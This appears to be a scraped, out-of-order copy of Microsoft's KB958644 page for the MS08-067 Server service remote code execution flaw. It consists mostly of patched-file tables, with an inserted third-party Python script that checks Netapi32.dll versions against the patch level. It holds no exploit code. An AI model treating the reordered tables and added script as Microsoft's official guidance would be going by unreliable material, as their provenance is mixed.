| Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.0.1.0.mum | Not Applicable | 1,441 | 16-Oct-2008 | 15:02 | Not Applicable |
| Update-bf.mum | Not Applicable | 3,519 | 16-Oct-2008 | 15:02 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_8b10fff30496576a.manifest | Not Applicable | 12,029 | 16-Oct-2008 | 05:29 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_8bbe0f461d98ec8d.manifest | Not Applicable | 12,029 | 16-Oct-2008 | 04:57 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest | Not Applicable | 12,029 | 16-Oct-2008 | 05:24 | Not Applicable |
| X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest | Not Applicable | 12,029 | 16-Oct-2008 | 05:09 | Not Applicable |


Additional files for all supported IA-64-based editions of Windows Server 2008

| File name | File version | File size | Date (UTC) | Time (UTC) | Platform |
|---|---|---|---|---|---|
| Ia64_5318e8eb9e87d0695533f066c047f96b_31bf3856ad364e35_6.0.6001.18157_none_82a29afb7aa0d23c.manifest | Not Applicable | 698 | 16-Oct-2008 | 15:02 | Not Applicable |
| Ia64_9c84e32c7f67dae6326ee85998cad9e6_31bf3856ad364e35_6.0.6001.18157_none_9713870461709fdd.manifest | Not Applicable | 1,038 | 16-Oct-2008 | 15:02 | Not Applicable |
| Ia64_f1b22e2871aa832be2376a26d588f7f5_31bf3856ad364e35_6.0.6001.22288_none_d0e8a3e531733c64.manifest | Not Applicable | 1,038 | 16-Oct-2008 | 15:02 | Not Applicable |
| Ia64_f420bbd70e5d59529cd3c0d55fc47000_31bf3856ad364e35_6.0.6001.22288_none_fa8a6023da16ba48.manifest | Not Applicable | 698 | 16-Oct-2008 | 15:02 | Not Applicable |
| Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d06b35901b0216b.manifest | Not Applicable | 12,048 | 16-Oct-2008 | 08:04 | Not Applicable |
| Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d70e0aa1ae52e5f.manifest | Not Applicable | 12,048 | 16-Oct-2008 | 06:02 | Not Applicable |
| Package_1_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,748 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 2,452 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_2_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,961 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 2,885 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_3_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,961 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_3_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 2,885 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,415 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,434 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,416 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,436 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,419 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,438 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,424 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,444 | 16-Oct-2008 | 15:02 | Not Applicable |
| Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum | Not Applicable | 1,416 | 16-Oct-2008 | 15:02 | Not Applicable |

File name

Package_for_kb958644_winpesrv_0~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,435

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,423

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,443

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Update-bf.mum

File version

Not Applicable

File size

2,381

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:24

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:09

Platform

Not Applicable

Additional file information for Windows 7 (Pre-Beta)

Additional files for all supported 32-bit versions of Windows 7 (Pre-Beta)

File name | File version | File size | Date (UTC) | Time (UTC) | Platform
Package_1_for_kb958644~31bf3856ad364e35~x86~~6.1.1.0.mum | Not Applicable | 1,817 | 18-Oct-2008 | 09:47 | Not Applicable
Package_1_for_kb958644~31bf3856ad364e35~x86~~6.1.1.1.mum | Not Applicable | 1,817 | 21-Oct-2008 | 21:07 | Not Applicable
Package_2_for_kb958644~31bf3856ad364e35~x86~~6.1.1.0.mum | Not Applicable | 1,822 | 18-Oct-2008 | 09:47 | Not Applicable
Package_2_for_kb958644~31bf3856ad364e35~x86~~6.1.1.1.mum | Not Applicable | 1,822 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.1.1.0.mum | Not Applicable | 1,468 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.1.1.1.mum | Not Applicable | 1,468 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_client~31bf3856ad364e35~x86~~6.1.1.0.mum | Not Applicable | 1,456 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_client~31bf3856ad364e35~x86~~6.1.1.1.mum | Not Applicable | 1,456 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.1.1.0.mum | Not Applicable | 1,462 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.1.1.1.mum | Not Applicable | 1,462 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.1.1.0.mum | Not Applicable | 1,466 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.1.1.1.mum | Not Applicable | 1,466 | 21-Oct-2008 | 21:07 | Not Applicable
X86_8c88416a1b833ae7bf1ac5e3ba55e123_31bf3856ad364e35_6.1.6801.4107_none_5d2c1db358bd7f56.manifest | Not Applicable | 694 | 21-Oct-2008 | 21:07 | Not Applicable
X86_9622219576c10955b3e5860711ff058f_31bf3856ad364e35_6.1.6801.4106_none_977a59a5a18b9d73.manifest | Not Applicable | 694 | 18-Oct-2008 | 09:47 | Not Applicable
X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest | Not Applicable | 2,401 | 18-Oct-2008 | 06:13 | Not Applicable
X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest | Not Applicable | 2,187 | 21-Oct-2008 | 08:25 | Not Applicable

Additional files for all supported 64-bit versions of Windows 7 (Pre-Beta)

File name | File version | File size | Date (UTC) | Time (UTC) | Platform
Amd64_6c5ff7f4df12fe656967bcd9a0851cf9_31bf3856ad364e35_6.1.6801.4107_none_9d8d50283e89a478.manifest | Not Applicable | 698 | 21-Oct-2008 | 21:07 | Not Applicable
Amd64_8bb4665ee38b9909b49c6690c13a54c9_31bf3856ad364e35_6.1.6801.4106_none_abaa496388f1d851.manifest | Not Applicable | 1,037 | 18-Oct-2008 | 09:47 | Not Applicable
Amd64_8c88416a1b833ae7bf1ac5e3ba55e123_31bf3856ad364e35_6.1.6801.4107_none_b94ab937111af08c.manifest | Not Applicable | 696 | 21-Oct-2008 | 21:07 | Not Applicable
Amd64_9622219576c10955b3e5860711ff058f_31bf3856ad364e35_6.1.6801.4106_none_f398f52959e90ea9.manifest | Not Applicable | 696 | 18-Oct-2008 | 09:47 | Not Applicable
Amd64_9ac4fb3739ecadbb3fe4552a8ce044b5_31bf3856ad364e35_6.1.6801.4106_none_5b9a53630b032ec0.manifest | Not Applicable | 698 | 18-Oct-2008 | 09:47 | Not Applicable
Amd64_f2e520fe3e78b2637293494b1895dead_31bf3856ad364e35_6.1.6801.4107_none_88b415476ce0db7b.manifest | Not Applicable | 1,037 | 21-Oct-2008 | 21:07 | Not Applicable
Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_2230761ac011a177.manifest | Not Applicable | 2,403 | 18-Oct-2008 | 06:26 | Not Applicable
Amd64_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_c50a98bb08a2c330.manifest | Not Applicable | 2,189 | 21-Oct-2008 | 08:33 | Not Applicable
Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,827 | 18-Oct-2008 | 09:47 | Not Applicable
Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,827 | 21-Oct-2008 | 21:07 | Not Applicable
Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 2,045 | 18-Oct-2008 | 09:47 | Not Applicable
Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 2,045 | 21-Oct-2008 | 21:07 | Not Applicable
Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 2,045 | 18-Oct-2008 | 09:47 | Not Applicable
Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 2,045 | 21-Oct-2008 | 21:07 | Not Applicable
Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,832 | 18-Oct-2008 | 09:47 | Not Applicable
Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,832 | 21-Oct-2008 | 21:07 | Not Applicable
Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,814 | 18-Oct-2008 | 09:47 | Not Applicable
Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,814 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,476 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,476 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,465 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,465 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,951 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,951 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,474 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,474 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,476 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,476 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,465 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,465 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,470 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,470 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.1.1.0.mum | Not Applicable | 1,475 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.1.1.1.mum | Not Applicable | 1,475 | 21-Oct-2008 | 21:07 | Not Applicable
X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest | Not Applicable | 2,401 | 18-Oct-2008 | 06:13 | Not Applicable
X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest | Not Applicable | 2,187 | 21-Oct-2008 | 08:25 | Not Applicable


Additional files for all supported IA-64-based versions of Windows 7 (Pre-Beta)

File name | File version | File size | Date (UTC) | Time (UTC) | Platform
Ia64_063c1cfe8cbabfce3ffb0dc28ef38fc5_31bf3856ad364e35_6.1.6801.4107_none_b39a525ed326a3c8.manifest | Not Applicable | 696 | 21-Oct-2008 | 21:07 | Not Applicable
Ia64_dc308b4973bef77766097858c0f07d87_31bf3856ad364e35_6.1.6801.4106_none_5a453cd060e99fe3.manifest | Not Applicable | 696 | 18-Oct-2008 | 09:47 | Not Applicable
Ia64_f556a82744118350805ca73aa737ccaa_31bf3856ad364e35_6.1.6801.4107_none_ff5785ba70f128b5.manifest | Not Applicable | 1,035 | 21-Oct-2008 | 21:07 | Not Applicable
Ia64_f6840120760844e1cf48807bba0611b4_31bf3856ad364e35_6.1.6801.4106_none_0132ac58e91cf28f.manifest | Not Applicable | 1,035 | 18-Oct-2008 | 09:47 | Not Applicable
Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c6137e8d07b2393d.manifest | Not Applicable | 2,402 | 18-Oct-2008 | 05:34 | Not Applicable
Ia64_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68eda12d50435af6.manifest | Not Applicable | 2,188 | 21-Oct-2008 | 06:53 | Not Applicable
Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.0.mum | Not Applicable | 2,040 | 18-Oct-2008 | 09:47 | Not Applicable
Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.1.mum | Not Applicable | 2,040 | 21-Oct-2008 | 21:07 | Not Applicable
Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.0.mum | Not Applicable | 1,827 | 18-Oct-2008 | 09:47 | Not Applicable
Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.1.mum | Not Applicable | 1,827 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.1.1.0.mum | Not Applicable | 1,468 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.1.1.1.mum | Not Applicable | 1,468 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.1.1.0.mum | Not Applicable | 1,469 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.1.1.1.mum | Not Applicable | 1,469 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.1.1.0.mum | Not Applicable | 1,472 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.1.1.1.mum | Not Applicable | 1,472 | 21-Oct-2008 | 21:07 | Not Applicable
Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.1.1.0.mum | Not Applicable | 1,460 | 18-Oct-2008 | 09:47 | Not Applicable
Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.1.1.1.mum | Not Applicable | 1,460 | 21-Oct-2008 | 21:07 | Not Applicable
X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest | Not Applicable | 2,401 | 18-Oct-2008 | 06:13 | Not Applicable
X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest | Not Applicable | 2,187 | 21-Oct-2008 | 08:25 | Not Applicable

Support for Windows Vista Service Pack 1 (SP1) ends on July 12, 2011. To continue receiving security updates for Windows, make sure you’re running Windows Vista with Service Pack 2 (SP2). For more information, refer to this Microsoft web page: Support is ending for some versions of Windows.

INTRODUCTION

This article discusses a beta release of a Microsoft product. The information in this article is provided as-is and is subject to change without notice.

No formal product support is available from Microsoft for this beta product. For information about how to obtain support for a beta release, see the documentation that is included with the beta product files, or check the Web location where you downloaded the release.
Microsoft has released security bulletin MS08-067. To view the complete security bulletin, visit one of the following Microsoft Web sites:

  • http://www.microsoft.com/protect/computer/updates/bulletins/200810.mspx

    Skip the details: Download the updates for your home computer or laptop from the Microsoft Update Web site now:

    http://update.microsoft.com/microsoftupdate/

  • http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx

This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system remotely. On Microsoft Windows 2000-based, Windows XP-based, and Windows Server 2003-based systems, an attacker could exploit this vulnerability over RPC without authentication and could run arbitrary code. If an exploit attempt fails, this could also lead to a crash in Svchost.exe. If the crash in Svchost.exe occurs, the Server service will be affected. The Server service provides file, print, and named pipe sharing over the network.

The vulnerability is caused by the Server service, which does not correctly handle specially crafted RPC requests.

How to obtain help and support for this security update

File information

The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time and with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.

For all supported editions of Microsoft Windows 2000 Service Pack 4

File name | File version | File size | Date | Time | Platform
Netapi32.dll | 5.0.2195.7203 | 310,032 | 18-Oct-2008 | 03:11 | x86


Windows XP and Windows Server 2003 file information notes

  • The files that apply to a specific milestone (RTM, SPn) and service branch (QFE, GDR) are noted in the "SP requirement" and "Service branch" columns.

  • GDR service branches contain only those fixes that are widely released to address widespread, critical issues. QFE service branches contain hotfixes in addition to widely released fixes.

  • In addition to the files that are listed in these tables, this software update also installs an associated security catalog file (KBnumber.cat) that is signed with a Microsoft digital signature.


For all supported x86-based versions of Windows XP

File name | File version | File size | Date | Time | Platform | SP requirement | Service branch
Netapi32.dll | 5.1.2600.3462 | 332,800 | 15-Oct-2008 | 16:57 | x86 | SP2 | SP2GDR
Netapi32.dll | 5.1.2600.3462 | 339,456 | 15-Oct-2008 | 16:53 | x86 | SP2 | SP2QFE
Netapi32.dll | 5.1.2600.5694 | 337,408 | 15-Oct-2008 | 16:34 | x86 | SP3 | SP3GDR
Netapi32.dll | 5.1.2600.5694 | 339,456 | 15-Oct-2008 | 16:25 | x86 | SP3 | SP3QFE


For all supported x64-based versions of Windows Server 2003 and of Windows XP Professional x64 edition

File name | File version | File size | Date | Time | Platform | SP requirement | Service branch
Netapi32.dll | 5.2.3790.3229 | 603,648 | 17-Oct-2008 | 11:44 | x64 | SP1 | SP1GDR
Wnetapi32.dll | 5.2.3790.3229 | 350,208 | 17-Oct-2008 | 11:44 | x86 | SP1 | SP1GDRWOW
Netapi32.dll | 5.2.3790.3229 | 606,720 | 17-Oct-2008 | 11:44 | x64 | SP1 | SP1QFE
Wnetapi32.dll | 5.2.3790.3229 | 352,768 | 17-Oct-2008 | 11:44 | x86 | SP1 | SP1QFEWOW
Netapi32.dll | 5.2.3790.4392 | 603,648 | 17-Oct-2008 | 11:53 | x64 | SP2 | SP2GDR
Wnetapi32.dll | 5.2.3790.4392 | 345,088 | 17-Oct-2008 | 11:53 | x86 | SP2 | SP2GDRWOW
Netapi32.dll | 5.2.3790.4392 | 606,720 | 17-Oct-2008 | 11:44 | x64 | SP2 | SP2QFE
Wnetapi32.dll | 5.2.3790.4392 | 347,648 | 17-Oct-2008 | 11:44 | x86 | SP2 | SP2QFEWOW


For all supported x86-based versions of Windows Server 2003

File name | File version | File size | Date | Time | Platform | SP requirement | Service branch
Netapi32.dll | 5.2.3790.3229 | 350,208 | 16-Oct-2008 | 20:09 | x86 | SP1 | SP1GDR
Netapi32.dll | 5.2.3790.3229 | 352,768 | 16-Oct-2008 | 21:47 | x86 | SP1 | SP1QFE
Netapi32.dll | 5.2.3790.4392 | 345,088 | 16-Oct-2008 | 22:18 | x86 | SP2 | SP2GDR
Netapi32.dll | 5.2.3790.4392 | 347,648 | 16-Oct-2008 | 23:37 | x86 | SP2 | SP2QFE


For all supported IA-64-based versions of Windows Server 2003

File name | File version | File size | Date | Time | Platform | SP requirement | Service branch
Netapi32.dll | 5.2.3790.3229 | 905,216 | 17-Oct-2008 | 11:45 | IA-64 | SP1 | SP1GDR
Wnetapi32.dll | 5.2.3790.3229 | 350,208 | 17-Oct-2008 | 11:45 | x86 | SP1 | SP1GDRWOW
Netapi32.dll | 5.2.3790.3229 | 910,848 | 17-Oct-2008 | 11:45 | IA-64 | SP1 | SP1QFE
Wnetapi32.dll | 5.2.3790.3229 | 352,768 | 17-Oct-2008 | 11:45 | x86 | SP1 | SP1QFEWOW
Netapi32.dll | 5.2.3790.4392 | 905,216 | 17-Oct-2008 | 11:50 | IA-64 | SP2 | SP2GDR
Wnetapi32.dll | 5.2.3790.4392 | 345,088 | 17-Oct-2008 | 11:50 | x86 | SP2 | SP2GDRWOW
Netapi32.dll | 5.2.3790.4392 | 910,848 | 17-Oct-2008 | 11:45 | IA-64 | SP2 | SP2QFE
Wnetapi32.dll | 5.2.3790.4392 | 347,648 | 17-Oct-2008 | 11:45 | x86 | SP2 | SP2QFEWOW


Windows Vista, Microsoft Hyper-V Server 2008, and Windows Server 2008 file information notes

  • The files that apply to a specific product, milestone (RTM, SPn), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table:

    Version | Product | Milestone | Service branch
    6.0.6000.16xxx | Windows Vista | RTM | GDR
    6.0.6000.20xxx | Windows Vista | RTM | LDR
    6.0.6001.18xxx | Windows Vista SP1 and Windows Server 2008 SP1 | SP1 | GDR
    6.0.6001.22xxx | Windows Vista SP1 and Windows Server 2008 SP1 | SP1 | LDR

  • Service Pack 1 is integrated into the original release version of Windows Server 2008. Therefore, RTM milestone files apply only to Windows Vista. RTM milestone files have a 6.0.0000.xxxxxx version number.

  • GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.

  • The MANIFEST files (.manifest) and the MUM files (.mum) that are installed for each environment are listed separately. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files (attributes not listed) are signed with a Microsoft digital signature.
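The version-to-branch table above is the key to a correct "is this machine patched?" check: a Netapi32.dll revision only means something relative to the revision KB958644 ships for the same service branch, so a numerically higher revision from the LDR branch is not "newer" than a GDR file. The following Python is an added example, not code from the Microsoft article; it encodes the branch table above and the patched Netapi32.dll versions from the Windows Vista / Windows Server 2008 file tables on this page (the function names and the summary strings are mine). It expects a version string as shown in a file's properties dialog and is deliberately limited to the 6.0 family, for which this article spells out the branch ranges.

```python
"""Classify a Windows Vista / Windows Server 2008 Netapi32.dll file version and
check it against the MS08-067 (KB958644) level listed in this article."""
import re
from typing import NamedTuple, Optional, Tuple


class Branch(NamedTuple):
    product: str
    milestone: str
    branch: str
    patched_revision: int  # Netapi32.dll revision shipped by KB958644 for this branch


# Key: (build, leading two digits of the revision), as in the article's table.
# Values: the branch and the patched Netapi32.dll revision from the file tables above.
BRANCHES = {
    (6000, 16): Branch("Windows Vista", "RTM", "GDR", 16764),
    (6000, 20): Branch("Windows Vista", "RTM", "LDR", 20937),
    (6001, 18): Branch("Windows Vista SP1 and Windows Server 2008 SP1", "SP1", "GDR", 18157),
    (6001, 22): Branch("Windows Vista SP1 and Windows Server 2008 SP1", "SP1", "LDR", 22288),
}

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)$")


def parse_version(text: str) -> Tuple[int, int, int, int]:
    """Split 'major.minor.build.revision' into integers; reject anything else."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a four-part file version: {text!r}")
    return tuple(int(part) for part in m.groups())  # type: ignore[return-value]


def identify_branch(version: str) -> Optional[Branch]:
    """Return the branch for a 6.0.600x.NNxxx version, or None if it is not in the table."""
    major, minor, build, revision = parse_version(version)
    if (major, minor) != (6, 0):
        return None
    return BRANCHES.get((build, revision // 1000))


def is_patched(version: str) -> Optional[bool]:
    """True/False for a recognised Vista / Server 2008 branch, None when the version
    belongs to a product or branch this table does not cover."""
    branch = identify_branch(version)
    if branch is None:
        return None
    revision = parse_version(version)[3]
    # Compare only within the branch: revisions are not ordered across GDR and LDR.
    return revision >= branch.patched_revision


def assess(version: str) -> str:
    """Human-readable summary (hypothetical wording, not Microsoft's)."""
    branch = identify_branch(version)
    if branch is None:
        return f"{version}: not a Windows Vista / Server 2008 Netapi32.dll version in this table"
    state = "at or above" if is_patched(version) else "BELOW"
    return (f"{version}: {branch.product}, {branch.milestone} {branch.branch} branch, "
            f"{state} the KB958644 level ({branch.patched_revision})")


if __name__ == "__main__":
    # Constructed sample versions; the last one shows why cross-branch comparison is wrong:
    # 6.0.6000.20900 is numerically above the GDR level 16764 but is an unpatched LDR file.
    for sample in ("6.0.6001.18157", "6.0.6000.16700", "6.0.6000.20900", "5.1.2600.5694"):
        print(assess(sample))
```

Run on a file version read from Explorer's properties dialog (or any inventory export); `None` from `is_patched` means the version must be checked against a different table on this page, such as the Windows XP or Windows Server 2003 rows that carry an explicit "Service branch" column instead of a revision range.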


For all supported x86-based versions of Windows Server 2008 and of Windows Vista

File name | File version | File size | Date | Time | Platform
Netapi32.dll | 6.0.6000.16764 | 425,472 | 16-Oct-2008 | 04:40 | x86
Netapi32.dll | 6.0.6000.20937 | 425,984 | 16-Oct-2008 | 04:22 | x86
Netapi32.dll | 6.0.6001.18157 | 466,944 | 16-Oct-2008 | 04:47 | x86
Netapi32.dll | 6.0.6001.22288 | 466,944 | 16-Oct-2008 | 04:38 | x86


For all supported x64-based versions of Windows Server 2008, Hyper-V Server 2008, and Windows Vista

File name | File version | File size | Date | Time | Platform
Netapi32.dll | 6.0.6000.16764 | 607,232 | 16-Oct-2008 | 04:43 | x64
Netapi32.dll | 6.0.6000.20937 | 606,720 | 16-Oct-2008 | 04:28 | x64
Netapi32.dll | 6.0.6001.18157 | 648,704 | 16-Oct-2008 | 05:49 | x64
Netapi32.dll | 6.0.6001.22288 | 648,704 | 16-Oct-2008 | 05:02 | x64
Netapi32.dll | 6.0.6000.16764 | 425,472 | 16-Oct-2008 | 04:40 | x86
Netapi32.dll | 6.0.6000.20937 | 425,984 | 16-Oct-2008 | 04:22 | x86
Netapi32.dll | 6.0.6001.18157 | 466,944 | 16-Oct-2008 | 04:47 | x86
Netapi32.dll | 6.0.6001.22288 | 466,944 | 16-Oct-2008 | 04:38 | x86


For all supported IA-64-based versions of Windows Server 2008

File name | File version | File size | Date | Time | Platform
Netapi32.dll | 6.0.6001.18157 | 1,080,832 | 16-Oct-2008 | 06:21 | IA-64
Netapi32.dll | 6.0.6001.22288 | 1,080,832 | 16-Oct-2008 | 04:59 | IA-64
Netapi32.dll | 6.0.6001.18157 | 466,944 | 16-Oct-2008 | 04:47 | x86
Netapi32.dll | 6.0.6001.22288 | 466,944 | 16-Oct-2008 | 04:38 | x86

Windows 7 Pre-Beta file information notes

The MANIFEST files (.manifest) and the MUM files (.mum) that are installed for each environment are listed separately. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files (attributes not listed) are signed with a Microsoft digital signature.

For all supported x86-based versions of Windows 7 Pre-Beta

File name | File version | File size | Date | Time | Platform
